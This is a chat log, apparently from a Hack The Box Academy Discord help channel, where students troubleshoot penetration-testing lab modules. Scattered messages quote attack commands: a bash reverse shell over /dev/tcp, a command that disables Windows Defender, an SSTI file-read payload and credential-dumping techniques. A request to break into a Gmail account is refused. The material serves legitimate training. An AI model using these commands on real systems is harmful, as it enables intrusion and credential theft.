#modules
Server Side Attack - Blind SSRF
https://academy.hackthebox.com/module/145/section/1300
Which port is open in addition to port 80?
Any tips?
Fellows: crackmapexec or netexec?
Netexec, crackmap is archived
And netexec is the fork of it anyway
ffuf ports
learning process finished 😄
I saw very impressive things, are there more resources on these subjects?
Please, can someone help me with this error?
Which error?
Does anyone have open DMs to discuss the SA in the Introduction Evasion AV module?
Hi could someone help me with "Subdomain Bruteforcing question"? (module: INFORMATION GATHERING - WEB EDITION). Tried many different things but none of them seems to work.
The section has already provided procedures
Do the same
Just try changing the wordlists
Maybe
nvm, got it
Sure
Why can't I send messages to general?
Program 'GodPotato-NET4.exe' failed to run: The specified executable is not a valid application for this OS platform.
At line:1 char:1
https://academy.hackthebox.com/module/19/section/117
I've done this box and got approx. 20 detections by the IDS. Is it okay knowing it's an easy lab, or should I improve something?
I think the detections were like maximum 10, since every web refresh added 2 detections.
Password Attack Module :: Network Services Section
Hydra: doesn't work well for attacking SMB or is it just me / the HTB system / I'm missing a trick? I got definite results using NetExec / CME / and MSF.
Read and follow the instructions in #welcome
Identification error: please contact an online Moderator or Administrator for help.
This exercise behaved strangely for me as well. It seemed like I got a lot of detections by simply refreshing the web page that showed how many detections had happened, but not so much by scanning the box. You're good if you recognize the arguments to tone down aggression on scans.
how can I find admin?
HTB Support. Use chat on their main web page. 🤷
you can DM me
I see, how many detections did you have? Also, it is strange that the firewall seemed not to work even after I was "banned".
the identification errors are specific to Discord, so support on the website can't help
Thank you for the insight. If the question comes up in the future I'll refer to a Discord moderator.
It's been a while since I did that module so I don't remember how many I got. I only remember refreshing the page and seeing the detections number change each time, but the nmap scan didn't really seem to affect it that much. I'll fire it up now and try to see if I can come up with a clearer answer.
Alright, thanks!
Hmmm, somehow port 53 opened itself? Until 3 minutes ago it was filtered and I couldn't access it in any way, and now I suddenly can. Does anyone have an explanation?
Day 2 of hitting Flag 1. In order to get flag 1, I think I discovered a lot of info required for a few other flags maybe, but I'm still stuck at flag 1. This is clearly making me feel frustrated at this point, guys, as I'm running out of ideas.
Hello there, I'm really stuck in the malware analysis module on the orange.exe registry key. I've identified the function, and I'm 99% sure I've identified the path but I have a formatting error or something when pasting in the registry key. Can anyone give me a hint please?
Edit: Solved... I was pasting it in with the double slashes, my brain is fried
Is anyone able to help me on this weekend?
It's kinda silly but I can't ssh into this target.
In the security monitoring & SIEM fundamentals module
On the skills assessment for this module, the module doesn't give a username or anything, so I just type ssh then the target IP address and it says:
ssh: Could not resolve hostname 10.129.142.91:5601: Name or service not known
We are pretending to be an admin here, so I tried admin@ but that doesn't work either.
I have a problem. I am in https://academy.hackthebox.com/module/77/section/844 currently and don't know what to do anymore. I ran linpeas and checked a lot of files and still have no clue where to do something. Can anyone give me a hint?
Try using sudo -l
It returns
Matching Defaults entries for user1 on
ng-1399082-gettingstartedprivesc-ip3tc-5bfd7469b9-78zfc:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User user1 may run the following commands on
ng-1399082-gettingstartedprivesc-ip3tc-5bfd7469b9-78zfc:
(user2 : user2) NOPASSWD: /bin/bash
If you spawn the box and load the status page, the counter seems to start at 50/100 detections. If you know services are on there already you can get the answer without incrementing it at all. Like I remember, refreshing that status page seems to make the counter increase more than the scanning itself. And your observation that there isn't any firewall attached to the counter is accurate -- being blocked doesn't actually seem to stop any communication w/ the system.
now try and use that information
I see, now I have another issue, I can't seem to get around https://academy.hackthebox.com/module/19/section/119, could you maybe give me a hint?
Could you please name the module and section you’re on? That way other people can help too without having to click your link to see what you need help with
did you try ssh <user>@<ip> -p <port> ?
Anyone have problems with virtualization on the windows 11 enterprise evaluation vm in the setting up module?
Sure, it is the Network Enumeration with Nmap, section Firewall IDS/IPS Evasion - Hard Lab
Awesome, I haven’t done that one yet, so can’t be of any help 🙂
the module doesn't say what user I am going to assume to ssh in
Alright, no problem
but I tried the ssh ipaddress:5601
I can't find virtualization in the BIOS on this Windows 11 Enterprise evaluation VM, anyone dealt with this?
I just reviewed the assessment page, I do not understand why you are trying to SSH into the box. You just have to connect to Elastic via your web browser.
What are you trying to do? Run a Kali VM inside a Windows VM?
That is a tricky one. Be sure to thoroughly enumerate the ports that are open and note any oddities. Once you spot it, you'll have to try a few tricks to get an open response and pull any info out of the service.
Hey, in the Active Directory section, PrintSpoofer, actually what does that tool do?
In terms of SeImpersonate
Yes, I am just following the Setting Up module
Setting Up > Operating Systems > Windows
Dms?
Hello guys:
I'm stuck on the Firewall and IDS/IPS Evasion - Medium Lab exercise.
I'm trying to get the DNS server version and I have really run out of ideas. I tried all the steps on DNS Proxying and have really failed to retrieve the version, even with netcat.
for me it worked by waiting, the firewall just stopped after a while
I managed to use netcat and it worked lol, no idea how
IMO that's kind of a bad idea. But if you google 'nested virtualization' with your hypervisor and hardware, there are resources on how to do it.
But if you are not familiar with messing with your BIOS etc., I would skip that. It is not needed to complete the course. You are better off having a Kali VM and a Windows VM.
I thought it seemed strange, but I've been away for a while and wanted to try and kind of start fresh. I don't have any issues with changing things, although I can't seem to install Windows 11 on my system because Secure Boot always boots from the wrong drive and I can't seem to change it, but I digress. I wonder why the module would suggest doing it this way then.
I missed the DM request over lunch. Great news though! Play around with the netcat options to see which was important. This was an odd one.
It's suggesting that I build this and use it as a penetration testing host.
It can be practical to have a Windows attack host and all the Linux tools in the same box. Even if you do things like incident response, Linux tools are better to parse through logs, for instance. You can still do it if you are comfortable with it, just google the issue; solutions will be specific to your CPU and hypervisor.
I've never used WSL so I was a little excited to try it out. I have a minimal kali vm through wsl2 that I downloaded straight from the store but I haven't messed with it much because I wanted to get the vm working too. I feel like all I've done for hours is google it, but I will keep charging on.
Oh shit
Hmm, nested VM is enabled in VirtualBox too, thought that was going to be it.
I think the most common configuration is having a hypervisor like VMware or VirtualBox, then a Kali or Parrot VM as attack host.
I wouldn't like having Kali in WSL on my main Windows host. Things need to be separated in my opinion.
Completed the Linux fundamentals module. I’ve been using windows all my life (nothing cybsec related), should I skip the windows fundamentals module?
I'd say no. Even if you use Windows, there are new things to pick up, I guess.
Yeah that's why I wanted to get it working in the vm, I usually just run a full Kali VM or run it on one of my laptops but having both in one inside a vm sounds kind of fun and I like to try new things
Alright, thanks
I agree, worst thing that'll happen is you won't learn anything
I'm really at my wits end with it right now
Yeah, maybe someone here will give you a working solution, but as this is something specific to your config, I think you'd be better off googling for an answer. From here it is difficult to get a clear view of your problem.
Hi everyone,
I'm currently in the Advanced Deserialization module and struggling with code understanding and exploitation because I have never used C# before. I finished the Introduction to C# module but I still feel a big gap. Maybe someone can recommend resources to learn C#? Especially in the context of web apps.
Appreciate any advice!
Hey, I'm trying to solve the AD skills assessment part 2, specifically SUBMIT THE CONTENTS OF FLAG ON ADMINISTRATOR DESKTOP ON MS01 HOST.
I found a set of creds with crackmap dumping LSA, with the user administrator and a password I set.
Have a look at C# courses on Udemy or Youtube. In addition, a former HTB employee recommended this book to me.
Pro C# 10 with .NET 6: Foundational Principles and Practices in Programming
Thank you! Your advice is always worth gold ❤️
I am facing the same problem. I still have to learn C# and Java before I attempt the exam
In the Password Attacks module, in the NTDS.dit section, they use a password list called /usr/share/wordlists/fasttrack.txt, but in my Pwnbox there is no such list.
I can't establish a reverse shell. My machine runs nc -lvnp 1234 and the target bash -c 'bash -i >& /dev/tcp/10.10.14.110/1234 0>&1', just like the lesson told me. The target has no internet connection and I can only use the bash command. Why isn't it working?
which module is this?
I'm hard stuck on this module "Windows Event Logs and Finding Evil" if anyone is willing to help. I'm on #3 about finding the process that injected into the process that executed the unmanaged powershell
hi I'm on same lesson. If I solve it myself and you still need help later today or whatever I'll help you but not until I solve it.
why am I getting this error?
I am on Password Attacks Skills Assessment Hard, I am still getting this error after following:
Windows Privilege Escalation Skills Assessment - Part I
Was there really a way to get the ||ldapadmin password|| before having a SYSTEM shell? It seems that most people do it in that order, but the question is asked before telling us to escalate privileges. I just want to know if I'm chasing the impossible.
Edit: I am
Can I use the modules pwn box to solve machines ?
Hi, there's an issue with the reverse shell section of the Shells and Payloads module. This command to disable Windows AV doesn't work even if you copy and paste it into the Windows target box:
Set-MpPreference -DisableRealtimeMonitoring $true
it gives me an error that says:
PS C:\Users\htb-student> Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference : You don't have enough permissions to perform the requested operation.
At line:1 char:1
+ Set-MpPreference -DisableRealtimeMonitoring $true
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Set-MpPreference], CimException
    + FullyQualifiedErrorId : HRESULT 0xc0000142,Set-MpPreference
the section says to use that exact command
this is on the target box
I am able to RDP in successfully, but once I RDP in that command won't work. How do I fix this?
This VM is so slow
Getting this error when trying to VPN into target system -
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-unit-files ===
Authentication is required to manage system service or unit files.
Multiple identities can be used for authentication:
- mrb3n
- cry0l1t3
Choose identity to authenticate as (1-2): 1
Password:
polkit-agent-helper-1: pam_authenticate failed: Authentication failure
==== AUTHENTICATION FAILED ===
Failed to enable unit: Access denied
I've restarted and logged out of the system several times.
I just completely logged out of Hack the Box. I guess I'll try again later.
Do you need to perhaps do it from an admin PS session?
Hi
Task scheduling question: what is the type of the service of the "dconf.service"?
Answer: notify. I'm writing this answer, but it doesn't accept it.
Can you help me if you don't mind?
[23:18:39:600] [49475:49476] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[23:18:39:600] [49475:49476] [WARN][com.freerdp.crypto] - CN = WS01
[23:18:41:108] [49475:49476] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[23:18:41:108] [49475:49476] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[23:18:41:108] [49475:49476] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[23:18:41:108] [49475:49476] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
I'm doing the Windows Fundamentals room, but when trying to RDP into the machine I get a cert error, any ideas?
Can you clear xfreerdp's cache or config file? I'll bet you connected to another system at that same IP and it remembers the old cert and thinks it changed. Just a guess.
https://academy.hackthebox.com/module/112/section/1069 Stuck on last question. I am running two wordlists at the same time, still haven't found any host with ip that ends in .203 yet. It's been running for a while. Hint says use different wordlists, and I'm trying but the process is tedious.
Brute forcing with /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:
Brute forcing with /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt:
so far. There are like a dozen different wordlists though. Hmm.
I should combine all the domain wordlists into one, remove duplicates, and sort it into a master list. Might help.
Yes you are right
I just ignored the cert though and it worked, ty
Here's an article with a fix too, but good call 👍
https://servicedesk.mtu.edu/TDClient/1801/Portal/KB/ArticleDet?ID=96506
Hey! In the "Intro to whitebox pentesting" Skill assessment, is there a way to get /flag.txt without doing it via ||sleep timers||?
Could someone give me a hint on which wordlist to use? I've tried a few so far and no luck...
You need a fierce wordlist
Also subdomain of subdomain
It helps if you include the module and section name as well not just a link
It won't
ok
I will try that list thanks. I'll also try to include the module name and section
https://academy.hackthebox.com/module/112/section/1069 in this link, where can I find the module name and section name? I don't see them. Section name is Foot printing? what is the module? I know it's module #3 of the pentest job role path, but I don't know the name. This is just really extra work. It's much easier for someone to just click the link and look at the question
Nope. Foot printing is the module name.
Section is DNS
It's extra steps to look this information up. How necessary is it to provide module name and section name? I thought the link would be more than enough for someone to directly look at what is being asked about. I don't see it necessary to look up the module name and provide it. If you click the link, you can see the material and the question on which I'm stuck. That's the fastest way to my understanding. Thank you.
Thanks for the tip. Found it very fast by using that wordlist.
Otherwise I'd have to go through each list one by one and that would have taken a very long time. Much appreciated.
This is where your link takes me, what's the question?
Interesting, sir
When I click the link I see this:
I see. So we see different things?
Well I can see why it would be useful to include some extra information
Yeah I can see now
It appears so
If the link I share doesn't show you the same thing as I see, then yeah, then you need more info
It's because maybe you don't have academy and you have to be logged in? Just a guess
Nah, I'm logged in. I haven't started that module yet though, which could be why.
Hmm.
I have a student account as well
I don't understand, I'll include the name and section name, sure
Hi
Well if it takes you to the module page, you only need the section name from me then
very true
That I can provide, np
Looking up the module name is not so easy: you have to leave the page, open the modules link, then click the current in-progress module to see the module name.
So yeah, I can totally provide the section name with a link, np. Thanks.
I didn't realize we saw different things from the same URI
what
Glad we got it figured out 🫡
Cheers
to get started check out #welcome to verify your account
Is there an extra step to get internet connectivity within Pwnbox? I'm working through the first module "Intro to Academy", and cannot visit the target system using Firefox. The connection times out.
Also this is my first post, and I'm very new to HTB 🙂
Yooo
Alright, looks like I can land on the target within the learning module, but it's strange that public websites time out. Is there a way to allow the Pwnbox in the browser to get external internet access?
Hello everyone. Ran into an issue today while doing: https://academy.hackthebox.com/module/19/section/118
When I run the solution given by the "Show solution", it works in the PwnBox but not from my PC (Parrot OS). I have downloaded the VPN file again just to be sure, but without any success. Any reason for that or hint about what I should do? It is not the first time it has happened to me.
I also checked the nmap versions, they are exactly the same.
Having trouble on Preignition
I was able to install Go and pull up the list of switches under the help command. However, I keep getting errors when running sudo gobuster dir -w /usr/share/wordlists/dirb/common.txt -u {target ip}
It seems that the VPN and the PwnBox are connected to different networks for some reason?
Strange. Not the best experience for the introductory module. I only have the option to spawn the pwnbox and the target machine. Not a huge issue, as it does allow access to the target machine. Wondering if this is intentional for this particular exercise. Only tested an external website because the target machine also timed out initially. Still an interesting edge case.
Also, I continued and did the next lab. The first time it worked in the PwnBox and not on my PC (this is how I found out I was on a different network, as the ports shown were different). Then when I changed the server, re-downloaded the file, and rebooted both the PC and PwnBox, the nmap part works but not the solution I used previously (same for the solution preset in the "show solution" thingy).
Hello?
Do you get an error message?
Hi
Spoiler alert: For context, the first time I tried the Hard lab, the nmap and netcat commands were working as expected and I got the flag. Then when I tried on my PC it failed. I then found out that for some reason I was scanning a different PC (VPN issue maybe?).
I then changed the VPN and location so my PC and the PWNBOX(SG server) were both on the same VPN (US Academy 6). Re-downloaded the file for my PC. The nmap scan finally gave the expected result for both of them, but I was not able to get the flag using netcat like before (or the solution given in the "show solution"). On the Pwnbox I had a request timeout and on my pc:
sudo nc -nv -p 53 10.129.184.246 53
(UNKNOWN) [10.129.184.246] 53 (domain) : Connection refused
If you are using the free plan, you have limited internet access.
Good to know, thanks.
Are you using TCP or UDP?
I tried both
But you only have either VPN or PwnBox active, right?
Both together do not work
Ah that might be why. Let me check that out. But it seemed that in some cases I could not do it even with just one on
If it does not work with the PwnBox and you do not have a VPN active, then contact support
New to HTB, only have done a few in "Starting point". I had difficulty connecting through TCP. UDP worked though. Anyone know why, or if this is a common issue? Connected using OpenVPN in a Kali VM on my home machine.
Hello folks. I'm on this: https://academy.hackthebox.com/module/112/section/1072, FOOT PRINTING, SMTP, Last Question:
I'm using msfconsole to do smtp enum on a username wordlist, but what other wordlists can I use for usernames? The hint says:
On systems usernames are often named after the employee's name. We recommend to use the Footprinting-wordlist provided as resource. Remember that some SMTP servers have higher response times.
Where can I find this footprinting wordlist on Kali linux? Thanks.
https://nmap.org/nsedoc/scripts/smtp-enum-users.html#script-args I can't figure out this script, if it's possible to give this script a custom wordlist to use
The list can probably be found under Resources. If the module provides you with a list, it is not included in Kali
So I should use Parrot OS? The list is in there? I can't see any link for any list in the module
I have just tried with the VPN alone (no Pwnbox), it does not work. Same with the Pwnbox. And despite using the same VPN, scanning the server gives me 2 different nmap results. I think there is an issue with the VPN. And I cannot use netcat in either case. Same error as before.
Then contact support so that they can check this
Thank you for your time
I'm having a ROUGH time with ACTIVE DIRECTORY ENUMERATION & ATTACKS: Kerberoasting - from Linux (https://academy.hackthebox.com/module/143/section/1274). It seems like the domain controller isn't running? I've tried restarting the server a couple of times. Also my SSH keeps dropping my connection every 30 seconds or so (both personal machine and Pwnbox).
┌─[htb-student@ea-attack01]─[~]
└──╼ $GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation
Password:
[-] [Errno 113] No route to host
┌─[htb-student@ea-attack01]─[~]
└──╼ $for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
64 bytes from 172.16.5.225: icmp_seq=1 ttl=64 time=0.067 ms
Any suggestions?
No you don't
It's literally at the top of the page
Change vpn regions
Huh, yeah, I see the current region I'm using is under high load, I'll give that a shot. But would that fix the domain controller issue?
Potentially, I also suggest switching EU to US or vice versa
Hm that seems kind of counter intuitive 😅
It seems odd but some regions just work better
Thanks!
Hm I hate that that fixed all my issues, thanks!
Your first clue to changing regions/regenerating your vpn was the random disconnects
hello, still same error
my first juicypotato hit after 8 tries and it sends some weird data that kicks me out 💀
aight we good
What's the difference between an -sS scan and -sT? My confusion is that both send the same SYN flag and wait for a RST or SYN-ACK packet?
nevermind
-sS is a half connection
It closes the connection and doesn't allow a full connection
Yes I want to learn it
Are you on the module?
Did you have a particular question or issue?
I'm starting to learn it
I'm a beginner
I'm just prioritising to learn these skills so that I can start my bug bounty journey asap
Prioritize learning it over speed
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: AD Enumeration & Attacks - Skills Assessment Part II
So far, I have managed to get credentials for m* domain account. This user has administrative rights over M* server. BloodHound shows that the user also belongs to Domain Admins group. However, when I execute whoami /all command, it doesn't show that the user belongs to Domain Admins. Furthermore, I have tried to do the following:
- DCSync using mimikatz => ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
- Add the user to A* group => Insufficient access rights to perform the operation
- Take NTDS.dit dump => cannot be found in the \Windows\NTDS\NTDS.dit location, searched and found one in the \Windows\WinSxS directory, but decrypting using secretsdump.py gives an error
- Take LSASS dump => Only contains information about the same user and computer account (whose hash cannot be cracked)
- Checked for noPac, PrintNightmare, ASREPRoasting, PetitPotam
- I know the user C* that I need to get access to. But I am not sure how.
Love solving skills assessments and then looking up a write up and finding out I did it a totally different way than normal 
now it's the time to capture some stuff
also I'm pretty sure the machine account won't be in the DA group
Could anyone help me with API Attacks module with question about attacking user masonjenkins@yamil.com ?
Oh, I understand now. That's the module name. I see. Thanks a lot. I was confusing myself.
Hi all, I'm stuck on the Linux Privilege Escalation (environment enumeration) section. I know I need to sudo with lab_adm. HOWEVER, I can't figure out how. I tried sudo -u lab_adm /bin/ncdu, but that gives me permission denied. I tried sudo -l -u <command>, nothing works, permission denied. What am I supposed to do to get into the lab_adm account? I tried sudo -i -u lab_adm <command>, and essentially any combination of sudo + switch + lab_adm you can think of. Nothing is working. SO I HAVE TO be doing something wrong.
Hi, I need help around "Exploiting SSTI - Twig". I get the answer through RCE. However, the LFI part does not seem to work.
payload name={{ '/flag.txt'|file_excerpt(1)}}
https://imgur.com/a/cRhFV0c (sorry for imgur link, somehow I can't upload an image)
Anyone got a go-to list for fuzzing file upload extensions? I know about the ones from SecLists and PayloadsAllTheThings, but they seem incomplete, not fuzzing everything.
Like what?
In the "Intrusion Detection With Splunk (Real-world Scenario)" module, in question no. 3: how do I identify a suspicious process that loads clr.dll? In fact, there are many legitimate processes that load clr.dll, such as powershell.exe, etc.
@simple loom
@acoustic owl yes, I get an error message
Work around Sysmon event ID 7 (Image Load). This way you can identify what images are loaded. Once you identify one PE that might be interesting, you can see the processes it started, who is parent to it, etc.
what can you capture once you get system? I think we've talked about this before
https://academy.hackthebox.com/module/112/section/1073
Module: Footprinting
Section: IMAP/POP3
Last question: Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})
I've fetched the email, full with body, and I can't seem to find the flag anywhere. Could anyone give a hint on where I'm supposed to see the flag?
Finally got everything done except AEN. Excited to go into it blind and see how good my notes are 😄
Which will likely turn into sadness real quick
I see two mailboxes. INBOX has nothing. the other inbox has 1 email. I fetch it, full with body, and I don't see flag. So I'm lost for right now.
On what basis would a file.exe that loads clr.dll be of interest?
I did not retry it recently, but it was doable with the fetch command. Another option is to use the Evolution mail app, set up the compromised account and retrieve the inbox content.
Oh. You don't just fetch it, you fetch with a specific RFC parameter.
I got it now. I saw some example of fetch with RFC822 and I tried that and was able to see email body finally
Thank you
When running bruteforce methods on Academy, is there a wordlist one should use specifically. Like in Labs where there is set lists.
SecLists in general will have what you need
Introduction to Pivoting, Tunneling, and Port Forwarding
SOCKS5 Tunneling with Chisel
Should I try using another version of Chisel or try and install the dependencies?
just download the older release from the repo
YARA & Sigma for SOC Analysts - Skill assessment
The "C:\Rules\yara\seatbelt.yar" YARA rule aims to detect instances of the "Seatbelt.exe" .NET assembly on disk. Analyze both "C:\Rules\yara\seatbelt.yar" and "C:\Samples\YARASigma\Seatbelt.exe" and specify the appropriate string inside the "$class2" variable so that the rule successfully identifies "C:\Samples\YARASigma\Seatbelt.exe". Answer format: L________r
Does anyone know how to approach this question in the intended way
I have solved it simply using regex analysis of the strings output of the binary for strings that look like L________r which is probably not the intended way
I haven't found any other way to solve this
Focus not that much on the exe that loads it, but the childprocesses that are generated by an exe that loads it (Check for images or processes created by processes with parent process the one that loaded)
When I access the URL through browser it works fine with download but CLI throws this.
Do you think it's because it is not the main repo?
Since it is .NET you could always analyze it using dnspy and check for those classes 🙂
you can only git clone a whole repo, for individual files use wget
git is only valid for git related stuff
What web browser am I to be using here? (Shells & Payloads skills assessment)
firefox in the terminal
it works, thanks
Hello guys, can I have some help with the module Digital Forensics Practical Scenario?
Good afternoon, looking for any pointers on the CrackMapExec skills assessment question 3. I've compromised the SQL Server entirely, dumped creds and tried to reuse the hashes (have been unable to crack them). I've run a couple of different scripts as an admin looking for interesting info with no joy on the SQL server. I've identified an Intern user from the SQL database and found a writable share on the DC and tried to see if I can get anyone to authenticate via a malicious file in the share (there doesn't seem to be any info in the share itself). Tried a few different ways to enumerate the DEV server with no joy. Haven't got anywhere with the CME modules looking for group managed passwords etc also. Starting to run out of ideas.
Are you doing 1 fetch 1 all? If so, that's why. You need to fetch the body[]
good idea
Just a short feedback for devs - Rpivot (Pivoting, Tunneling, and Port Forwarding) depends on python2.7 and apparently it was removed from Parrot OS (?) - not available for install in PWNBox.
Fix Install Python2:
curl https://pyenv.run | bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(pyenv init -)"' >> ~/.bashrc
source ~/.bashrc
pyenv install 2.7
pyenv shell 2.7
python --version
Credits to whomever posted this, bc I got that on my notes a while ago hahaha
Hi
Contact Google for support with Gmail
I've tried it for over a month, but Google is not answering.
I know my Gmail account's old password, can anyone help me get its password 🔑
There is nothing we can do here in terms of Google Accounts.
Google Support only
No, that is illegal and will not be tolerated here
But I need you know any person
Be patient or take your loss. We can not help you as that would be illegal.
module: Information Gathering - Web Edition
section: Web Archives
How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234.
Where can I track how many labs there are?
I mean at all; I know how to use the Web Archive, but I have never seen HTB post a number of labs.
HTB has not always used the TLD com 😉
||a fetch 1 RFC822|| It has to be this. I was doing a FETCH 1 ALL or a FETCH 1 BODY
||* a fetch 1 all
1 FETCH (FLAGS (\Seen) INTERNALDATE "08-Nov-2021 23:51:24 +0000" RFC822.SIZE 167 ENVELOPE ("Wed, 03 Nov 2021 16:13:27 +0200" "Flag" (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("Robin" NIL "robin" "inlanefreight.htb")) NIL NIL NIL NIL))
a OK Fetch completed (0.001 + 0.000 secs).
||
The brackets are required with body[]
It's why I explicitly put them there
body[] does the same thing
I see
This is for the one with the ICMP tunnel: do I have to downgrade my attacker's glibc version before compiling ptunnel-ng?
So I suppose I need to install some autoheader? Not that experienced with compiling, tbh.
No, compile it on your host.
oml... my bad
Man, this was hella clunky but thank God it's done.
That was a miserable exercise.
The ideas are cool but the environment is like from the 90s
the password attack module is taking me way longer than the 8 hours it mentions in the module description lol
What did I do wrong?
are the lists in your current directory?
Also, brute-forcing WinRM is very inefficient; even if your lists are small it will still take forever.
You’re not alone mate. Took me ages.
I did as in the module.
"password.list" is just an example; you should use your own password file.
Can anyone help me install the VPN? I'm lost, I just started today.
Module: Password Attacks, section: Network Services
Okay, but then which sheet should I take?
I can't find it
So I'm doing Linux Fundamentals, and I'm doing the first questions, and I feel a little lost. IDK if there's something I missed, but the question is "What is the path to the htb-student's mail?" I figured it would be /var/log or /var/mail as the answer, but they're both wrong and I'm kind of just lost. Didn't know if anyone could point me in the right direction; I don't want the answer to it.
Usually the command looks like
"sudo openvpn academy-regular.ovpn"
You are on the right way; there should be something in /var/mail.
There is not; I ran ls and nothing came back.
It says I have to type install openvpn to get it, but where? 😭
The terminal...
It should be installed by default; this command should work.
If you are using Kali, there is no need to install openvpn. If you are using PwnBox, you don't need to connect to the VPN.
If you are using Kali and want to connect to the VPN, just use the command "sudo openvpn path/vpn_file.ovpn".
I think it's worth trying the Linux Fundamentals module first.
Thank you so much, I completely forgot about the /etc dir.
I don't think it is an answer...
I don't think so either, but it is very helpful.
There is another answer on the forum.
You should read again what env is.
I believe it should be in the module.
I even used env too and I had the answer in front of me at least 3 times. I'm blind as a bat, omg, I feel embarrassed af ngl.
well we live and we learn
it's okay
Have been stuck on this
Can't enumerate the username at all via brute force or exploration.
Valid username filter "Invalid credentials."
Invalid username filter "Unknown username or password."
Used xato 10 million and names.txt both from SecLists.
Cookies are PHPSESSID and aren't exploitable.
profile.php can't be accessed by modifying the status code or anything.
And 2fa.php won't work with any registered user. Tried to brute-force up to 10k combinations with the current session ID of my registered user.
https://academy.hackthebox.com/module/80/section/848
Windows Privilege Escalation
Communication with Processes > Named Pipes
"From here, we could leverage these lax permissions to escalate privileges on the host to SYSTEM."
How? By using getsystem through a meterpreter shell? Did I miss a concrete example somewhere in the CPTS path?
Hello, I am running into an issue here, Module/Hacking WordPress/Skills Assessment... I get the following, any help?
Did you try to open the URL in a web browser?
Yes, the website is displaying nicely.
But is it running WordPress?
Is it not supposed to? It's the WordPress module. Am I missing something?
Explore the site.
I found a flag and for some reason HTB is not accepting it.
I hear you, okay.
Check the port, check where the site is placed... maybe it's like http://ip/wordpress
Or maybe the website is located on a subdomain 😉
Why go this far for an easy module?
Check the flag format, or maybe if there are more questions, maybe you are not entering the right flag for that question.
Glad I'm not the only one lol
I did HTB{flag}
Always take into account all the options, pay attention to details and try debugging, because you will learn a lot trying to fix things or understanding errors.
what module and section?
JavaScript Deobfuscation Source Code
Check for spaces.
No spaces
if there are spaces before, or after, you will get that error
None before or after
let's not just put flags here outright yeah, even if it's a tier 0 module
My bad
that's not the right flag for that section
Got it working now, thanks! @next bronze @steady dust
the name of the section would be a hint
Hi, I'm trying to resolve the question "How many total packages are installed on the target system?" in the "File Descriptors and Redirection" section from the Linux Fundamentals module. I've tried using the find command and searching for some extensions (.deb, .dpkg) and another option, using "apt list --installed | wc -l", but I haven't obtained the correct answer. Any hints that can redirect me? Thanks so much!
Subject: Linux Fundamentals - The "Find Files and Directories"
Feedback:
- Material covered has little to do with the exercises presented to us
- would be beneficial to see the format desired for question 1 " What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"
I have tried all conf files that I can determine work:
- auto.conf
- tristate.conf
Neither works, and the "Show Solution" button does not work.
If anyone has any suggestions please let me know
Hi, try: find -name "*.conf" -type f -size +25k -size -28k 2>/dev/null
Hi, I have tried this now: " dpkg --list | grep '^ii' | wc -l "
Hi, I need a little help to understand the CSRF token theft in this module: Cross-Site Request Forgery (POST-based) (Session Security course).
I don't understand how HTML injection is used to send the token to our server.
Evening don't suppose I could get a nudge with this? Still stuck.
Hello Hackaz! I am in SQL modules: https://academy.hackthebox.com/module/33/section/194
The question I need help with: Try to log in as the user 'tom'. What is the flag value shown after you successfully log in?
It says I am logged in as 'admin', which was demonstrated in the article, but I am supposed to be 'tom' and find a flag which doesn't appear to be in the source code or in the network tab.
I'm having trouble getting my Noriben file to save on the malware analysis module
have you tried using 'or' logic within the username field?
I know what you mean, but I am already in with username tom. There is just no flag. I think it is a bug.
If it's showing admin, you're not logged in as tom.
Then it must be a bug.
Will try it again tomorrow, if I still don't get the flag, I'll open a chat.
Hello, I need some help please on the SERVER-SIDE ATTACKS module, Identifying SSRF; stuck on "Exploit a SSRF vulnerability to identify an internal web application." I have no idea how they want me to identify an internal web application with SSRF.
https://academy.hackthebox.com/module/145/section/1295
I'm currently on Domain Information from Footprinting and it's straight gibberish; I can't understand like anything at all. Could someone help me by explaining the commands in this section? Thank you!
In Information Gathering - Web Edition, Creepy Crawlies, I need to identify the location where future reports will be stored, but all that I am finding is this. While it gives me a hint that something might be in the comments, it says to give the answer with the full domain. Any suggestions for finding more info through ReconSpider?
Can anyone help me with lockphish in Kali?
There is a problem with the direct link.
I am not getting any direct link as output.
I am not able to upload a pic here, so please help me with this if anyone can.
Those are what's showing in results.json?
It's what the module gave me. The domain it's asking me to run ReconSpider on is the same as the example. But when I download everything in the module and run ReconSpider, it says permission denied and doesn't save anywhere. But running the same command with sudo says python3.pv doesn't exist.
You mean reconspider.py doesn't exist?
Footprinting module: "What is the customized version of the SNMP server?" I've no idea what the answer format should be, any hints?
Yes
And you did the wget and unzipped it?
yep
InFreight [Protocol] v[Version]
aaahhh thank you!
np man
